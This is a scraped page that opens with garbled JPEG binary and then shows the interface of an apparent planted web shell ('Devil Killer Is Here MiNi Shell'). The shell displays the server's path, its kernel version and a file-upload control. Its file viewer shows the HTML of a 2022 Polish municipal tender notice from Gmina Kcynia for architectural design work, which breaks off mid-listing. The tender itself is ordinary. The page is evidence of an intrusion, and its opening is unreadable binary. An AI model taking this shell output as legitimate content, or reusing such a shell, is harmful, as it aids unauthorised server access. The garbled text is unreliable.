JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220609/0020182501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowych budowy, przebudowy, rozbudowy, remontu i rewitalizacji budynków i obiektów na terenie Gminy Kcynia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kcynia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350872</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kcynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kcynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kcynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych budowy, przebudowy, rozbudowy, remontu i rewitalizacji budynków i obiektów na terenie Gminy Kcynia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e9804ab3-e7d2-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00201825</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019958/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wykonanie dokumentacji projektowej dot. budowy, przebudowy, rozbudowy, remontu i rewitalizacji obiektów na terenie Gminy Kcynia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/603141 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wszystkie szczegóły dot. komunikacji elektronicznej, strony internetowej, oświadczenia z art. 125 ust. 1, podmiotowych i przedmiotowych środków dowodowych oraz innych oświadczeń i dokumentów zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/603141</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/603141</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje nt. RODO zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/603141</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje nt. RODO zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/603141</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.1.603141.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla inwestycji pn.: „Rozbudowa i przebudowa świetlicy wiejskiej w Dobieszewie”, uwzględniająca poniższe warunki:<br/>a)	lokalizacja obiektu: działka numer ewidencyjny 72/6 obręb Dobieszewo, gmina Kcynia,<br/>b)	układ funkcjonalny budynku przewidujący pomieszczenia świetlicy wiejskiej, w tym rozbudowę o pomieszczenie kotłowni,<br/>c)	pomieszczenia OSP, garaż dla samochodu oraz miejsce na wyposażenie,<br/>d)	szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy,<br/>e)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>f)	dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego, <br/>g)	dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>h)	decyzją Starosty Nakielskiego nr 632 z dnia 14 listopada 2013 r. udzielono pozwolenia na rozbudowę świetlicy wiejskiej na działce numer 72/6 w miejscowości Dobieszewo, gm. Kcynia – pozwolenie to straciło ważność,<br/>i)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter budynku, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla inwestycji pn.: „Przebudowa i remont łazienek w Szkole Podstawowej w Mycielewie”, uwzględniająca poniższe warunki:<br/>a)	remont i przebudowa następujących pomieszczeń (WC / łazienek / sanitariatów): ▪ dla dziewcząt na parterze budynku (powierzchnia po podłodze około 17 m2), ▪ dla dziewcząt na piętrze budynku (powierzchnia po podłodze około 16 m2), ▪ dla chłopców na parterze budynku (powierzchnia po podłodze około 15 m2), ▪ dla chłopców na piętrze budynku (powierzchnia po podłodze około 16 m2), ▪ dla niepełnosprawnych na parterze budynku (powierzchnia po podłodze około 8 m2), ▪ dla niepełnosprawnych na piętrze budynku (powierzchnia po podłodze około 8 m2),<br/>b)	zakres prac w każdym z pomieszczeń (do uwzględnienia w projekcie): roboty rozbiórkowe, roboty budowlane w tym: przygotowanie podłoża, montaż sufitów podwieszanych, licowanie ścian płytkami i podłóg terakotą, malowanie, wymianę drzwi i wyposażenia, roboty elektroinstalacyjne, roboty instalacyjne centralnego ogrzewania oraz roboty instalacyjne sanitarne,<br/>c)	wymiana instalacji kanalizacyjnej w budynku o długości około 100 m,<br/>d)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter budynku, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla inwestycji pn.: „Budowa sali widowiskowej wraz z zapleczem, infrastrukturą techniczną i zagospodarowaniem terenu przy ul. Libelta w Kcyni”, uwzględniająca poniższe warunki:<br/>a)	lokalizacja obiektów: GCKiB im. Klary Prillowej: ul. Libelta 27, 89-240 Kcynia, działki nr 1073/12, 1073/14 obręb Kcynia; park: m.in. działki nr 1071, 1065/3,1072, 1073/11, obręb Kcynia,<br/>b)	sala widowiskowa na około 200 miejsc siedzących z uwzględnieniem kompleksowego wyposażenia,<br/>c)	szatnie, garderoby, pomieszczenia gospodarcze i magazynowe, zaplecze sanitarne, komunikacja,<br/>d)	zagospodarowanie terenu (parku) przy sali w zakresie: uporządkowania terenu w obrębie istniejących ciągów komunikacyjnych, elementy małej architektury, oświetlenie i uporządkowanie terenów zielonych (nowe nasadzenia, itp.),<br/>e)	szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy,<br/>f)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>g)	dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego,<br/>h)	dla obszaru objętego projektem obowiązuje Uchwała nr III/27/2018 Rady Miejskiej w Kcyni z dnia 13 grudnia 2018 r. w sprawie miejscowego planu zagospodarowania przestrzennego na terenie miasta Kcynia. Uchwała jest m.in. dostępna na stronie Biuletynu Informacji Publicznej Urzędu Miejskiego w Kcyni (zakładka „Zagospodarowanie przestrzenne”),<br/>i)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter budynku, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla inwestycji pn.: „Budowa kontenerowego zaplecza sanitarno-socjalnego na boisku przy ul. Poznańskiej w Kcyni wraz z zagospodarowaniem boiska i budową infrastruktury towarzyszącej”, uwzględniająca poniższe warunki:<br/>a)	lokalizacja obiektów: boisko sportowe zlokalizowane jest na działce nr 588 w Kcyni,<br/>b)	kontenerowe zaplecze sanitarno-socjalne (pomieszczenia dla dwóch drużyn – szatnie i toalety; pomieszczenie dla zespołu sędziowskiego; pomieszczenie gospodarcze, pomieszczenia magazynowe, biura, sala spotkań, pomieszczenia dla sekcji tenisa ziemnego, pomieszczenia dla sekcji lekkiej atletyki i łucznictwa),<br/>c)	trybuny (wymiana ławek, zadaszenie),<br/>d)	oświetlenie terenu,<br/>e)	przebudowa istniejącego boiska o nawierzchni trawiastej wraz z niezbędnym wyposażeniem,<br/>f)	przebudowa istniejącej bieżni,<br/>g)	miejsca postojowe, parking,<br/>h)	pozostałe elementy (mała architektura – ławki dla drużyn, wiaty, kosze, ogrodzenie, itp.),<br/>i)	szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy,<br/>j)	dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>k)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>l)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter terenu, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla 2 oddzielnych inwestycji (= zadanie podzielone na 2 cz.) pn.: „Budowa boisk przy szkołach podstawowych w Dziewierzewie i Kcyni”, uwzględniająca poniższe warunki:<br/>a)	w zakresie budowy boiska 